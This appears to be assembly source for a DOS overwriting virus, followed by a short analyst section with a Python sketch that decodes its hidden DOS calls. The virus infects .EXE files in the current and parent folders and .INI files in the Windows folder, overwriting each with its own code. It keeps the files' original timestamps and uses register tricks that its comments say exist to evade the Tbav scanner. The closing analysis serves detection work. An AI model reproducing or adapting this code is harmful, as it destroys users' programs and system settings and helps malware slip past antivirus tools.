.model tiny
.radix 16                               ; let's use hex
.code
Org 100h                                ; This makes it *.COM

start:
        Mov Si,Si
        Mov Ax, offset filemask1        ; This does nothing for the virus
        Rol Ax,1                        ; but fools the heck out of Tbav
        Lea Dx, [filemask1]             ; Point Dx To FileMask
        Mov Ah, 4Eh                     ; Find First Match
Getbad1:
        Int 21h                         ; Let Dos Do It
        Jb start2                       ; If No Matches Get Out
        Mov Dl, 9Eh                     ; Found One, Point To The FileName
        Mov Dh, 00h
        Mov Cl, 7Ah                     ; This loads 7a04 into ax
        Xchg Ah, Cl                     ; shr makes 7a04 into 3d02
        Mov Al, 04h                     ; ' '
        Shr Ax,1                        ; Open The File Up
        Int 21h                         ; Let Dos Do It
        Xchg Bx, Ax                     ; Put File Handle In Bx
        Mov Ah,3f                       ; Read file
        Mov Cx,4                        ; Read 4 bytes
        lea dx,[return_bytes]           ; Load the offset dx
        int 21
        lea di,[return_bytes]           ; Load the offset of
                                        ; the fourth byte
                                        ; we just read into
                                        ; the virus
        cmp byte ptr ds:[di],8bh        ;
        je nxtmatch1                    ; If so assume infected,
                                        ; close file, and run
                                        ; infection cycle again
        Mov Ax,4202                     ; Check file size
        Xor Cx,Cx                       ; clear these registers
        Xor dx,dx                       ; '' ''
        Int 21                          ; Dos finds the end of the file
        cmp Ax,1710                     ; Returns the value in Ax
        jb nxtmatch1                    ; if smaller than 6000 jump to next
        Xor Cx,Cx                       ; We have to move the file pointer
        Xor dx,dx                       ; back to the start of the victim
        Mov Ax,4200
        Int 21
        Mov Al,0                        ; Get and push the date
        Mov Ah,0aeh                     ; ' '
        Ror Ah,1                        ; ' '
        Int 21h                         ; ' '
        Push Cx                         ; ' '
        Push dx                         ; ' '
        Xor Dl,Dl                       ; gotta keep those registers straight
        Mov dx, 0200h                   ; Start Writing At 0100h
        dec Dh                          ; trying to be a little tricky
        Mov Cx, 0FFFh                   ; Write the virus
        Mov Ah, 40h                     ; Write File
        Int 21h                         ; Let Dos Do It
        Mov Al,1                        ; pop and set the date time
        Mov Ah,0aeh                     ; ' '
        Ror Ah,1                        ;
        Pop dx                          ; ' '
        Pop Cx                          ; ' '
        Int 21h                         ; ' '
        Mov Ah, 3Eh                     ; Close File
        Int 21h                         ; Let Dos do it
        Xor Cx,Cx                       ; Clear these two before going
        Xor Ax,Ax                       ; any further
        ;jmp nxtmatch2
NxtMatch1:
        Mov Ah, 3Eh                     ; Close File
        Int 21h                         ; Let Dos do it
        Mov Ah, 4Fh                     ; Find Next Match
        jmp Getbad1                     ; Call To Start the overwrite

start2:
        push cs                         ; This part of the code performs
        pop ds                          ; the simple method of directory
        Mov dx, offset Path_name1       ; changes cd..
        Mov Ah,3bh
        int 21                          ; Dos helps us
        nop
        nop
        jc start3                       ; If we can't change exit
        nop
        nop
        jmp start

start3:
        push cs                         ; This part of the code performs
        pop ds                          ; the simple method of directory
        Mov dx, offset Path_name        ; changes to windows
        Mov Ah,3bh
        int 21                          ; Dos helps us
        jc error                        ; If we can't change exit
        Mov Si,Si
        Mov Ax, offset filemask2        ; This does nothing for the virus
        Rol Ax,1                        ; but fools the heck out of Tbav
        Lea Dx, [filemask2]             ; Point Dx To FileMask
        Mov Ah, 4Eh                     ; Find First Match
Getbad2:
        Int 21h                         ; Let Dos Do It
        Jb Outahere2                    ; If No Matches Get Out
        Mov Dl, 9Eh                     ; Found One, Point To The FileName
        Mov Dh, 00h
        Mov Cl, 7Ah                     ; This loads 7a04 into ax
        Xchg Ah, Cl                     ; shr makes 7a04 into 3d02
        Mov Al, 04h                     ; ' '
        Shr Ax,1                        ; Open The File Up
        Int 21h                         ; Let Dos Do It
        Xchg Bx, Ax                     ; Put File Handle In Bx
        Mov Ah,3f                       ; Read file
        Mov Cx,4                        ; Read 4 bytes
        lea dx,[return_bytes]           ; Load the offset dx
        int 21
        lea di,[return_bytes]           ; Load the offset of
                                        ; the fourth byte
                                        ; we just read into
                                        ; the virus
        cmp byte ptr ds:[di],8bh        ;
        je nxtmatch2                    ; If so assume infected,
                                        ; close file, and run
                                        ; infection cycle again
        Mov Ax,4202                     ; Check file size
        Xor Cx,Cx                       ; Clear these registers
        Xor dx,dx                       ; '' ''
        Int 21                          ; Dos finds the end of the file
        cmp Ax,0009h                    ; Returns the value in Ax
        jb nxtmatch2                    ; if smaller than 6000 jump to next
        Xor Cx,Cx                       ; We have to move the file pointer
        Xor dx,dx                       ; back to the start of the victim
        Mov Ax,4200
        Int 21
        Mov Al,0                        ; Get and push the date
        Mov Ah,0aeh                     ; ' '
        Ror Ah,1                        ; ' '
        Int 21h                         ; ' '
        Push Cx                         ; ' '
        Push dx                         ; ' '
        Xor Dl,Dl                       ; gotta keep those registers straight
        Mov dx, 0200h                   ; Start Writing At 0100h
        dec Dh                          ; trying to be a little tricky
        Mov Cx, 3000h                   ; Write the virus
        Mov Ah, 40h                     ; Write File
        Int 21h                         ; Let Dos Do It
        Mov Al,1                        ; pop and set the date time
        Mov Ah,0aeh                     ; ' '
        Ror Ah,1                        ;
        Pop dx                          ; ' '
        Pop Cx                          ; ' '
        Int 21h                         ; ' '
        Mov Ah, 3Eh                     ; Close File
        Int 21h                         ; Let Dos do it
        Xor Cx,Cx                       ; Clear these two before going
        Xor Ax,Ax                       ; any further
        jmp nxtmatch2
NxtMatch2:
        Mov Ah, 3Eh                     ; Close File
        Int 21h                         ; Let Dos do it
        Mov Ah, 4Fh                     ; Find Next Match
        jmp Getbad2                     ; Call To Start the overwrite

outahere2:
        ret
error:
        ret

Filemask1:      db '*.EXE',0
Filemask2:      db '*.INI',0
Path_name:      db '\WINDOWS',0
path_name1:     db '..',0
return_bytes:   dw ?

End start
End code
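For analysts: the listing never loads its INT 21h function numbers directly (`7A04` shifted right, `AE` rotated right, `0200` with `Dh` decremented), so a scanner matching literal `Mov Ah,3Dh`-style loads sees nothing. The Python sketch below is an added example, not part of the original listing; it constant-folds those register operations in a linear sweep to recover the values in effect at each `Int 21h`. The helper names (`get`, `put`, `value`, `recover_calls`) and the sample string are this example's own.

```python
import re

# 16-bit registers and their 8-bit halves; a missing or None value means unknown.
PAIRS = {"ax": ("ah", "al"), "bx": ("bh", "bl"), "cx": ("ch", "cl"), "dx": ("dh", "dl")}
DOS = {0x3D: "open file", 0x40: "write file", 0x57: "get/set file date/time"}
# Constructed sample: three obfuscated sequences copied from the listing.
SAMPLE = ("Mov Cl, 7Ah\nXchg Ah, Cl\nMov Al, 04h\nShr Ax,1\nInt 21h\n"
          "Mov Al,0\nMov Ah,0aeh\nRor Ah,1\nInt 21h\n"
          "Mov dx, 0200h\ndec Dh\nMov Ah, 40h\nInt 21h\n")

def get(st, r):
    vals = [st.get(n) for n in PAIRS.get(r, (r,))]
    return None if None in vals else int.from_bytes(vals, "big")

def put(st, r, v):
    for name, shift in zip(PAIRS.get(r, (None, r)), (8, 0)):
        if name:                         # store each half masked to 8 bits
            st[name] = None if v is None else v >> shift & 0xFF

def value(st, tok):
    if re.fullmatch(r"\d[0-9a-f]*h?", tok):      # hex literal (the listing sets .radix 16)
        return int(tok.rstrip("h"), 16)
    return get(st, tok)                          # register; None for labels and memory

def recover_calls(listing):
    """Linear sweep, jumps ignored: (AH, AL, DX, name) at each INT 21h."""
    st, calls = {}, []
    for line in listing.lower().splitlines():
        op, *args = re.split(r"[\s,]+", line.split(";")[0].strip())
        if not args:
            continue
        dst, a, src = args[0], value(st, args[0]), value(st, args[-1])
        bits = 16 if dst in PAIRS else 8
        if op == "int":
            if a == 0x21:
                calls.append((*(get(st, r) for r in ("ah", "al", "dx")), DOS.get(get(st, "ah"), "?")))
            put(st, "ax", None)          # AX now holds the DOS return value
        elif op == "mov":
            put(st, dst, src)
        elif op == "xchg":
            put(st, dst, src)
            put(st, args[1], a)
        elif None in (a, src) or op not in ("shr", "ror", "dec"):
            put(st, dst, None)           # unknown input or unmodelled instruction
        elif op == "dec":
            put(st, dst, a - 1)          # put() masks to the register width
        else:                            # shr, plus the wrapped-around bits for ror
            put(st, dst, a >> src | (a << bits - src if op == "ror" else 0))
    return calls
```

On the sample this recovers AX=3D02 (open, read/write), AH=57 (file date/time) and AH=40 with DX=0100 (write from offset 100h), which are the values a signature or heuristic rule should key on rather than the literal operands.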